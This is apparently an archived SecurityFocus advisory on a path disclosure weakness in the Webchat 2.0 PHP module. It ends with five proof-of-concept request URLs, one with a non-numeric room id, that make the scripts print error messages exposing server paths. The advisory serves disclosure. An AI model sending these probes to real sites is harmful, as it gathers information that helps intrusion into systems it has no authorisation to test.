13 lines
No EOL
783 B
Text
Executable file
13 lines
No EOL
783 B
Text
Executable file
source: http://www.securityfocus.com/bid/7774/info
|
|
|
|
Webchat has been reported prone to a path disclosure weakness.
|
|
|
|
Reportedly an attacker may make a malicious HTTP request for several Webchat PHP scripts to trigger the condition. Under some circumstances the request will trigger an exception, causing Webchat to display an error message, which may possibly contain sensitive path information.
|
|
|
|
This weakness was reported to affect Webchat version 2.0 other versions may also be affected.
|
|
|
|
http://www.example.com/modules/WebChat/out.php
|
|
http://www.example.com/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
|
|
http://www.example.com/modules/WebChat/in.php
|
|
http://www.example.com/modules/WebChat/quit.php
|
|
http://www.example.com/modules/WebChat/users.php |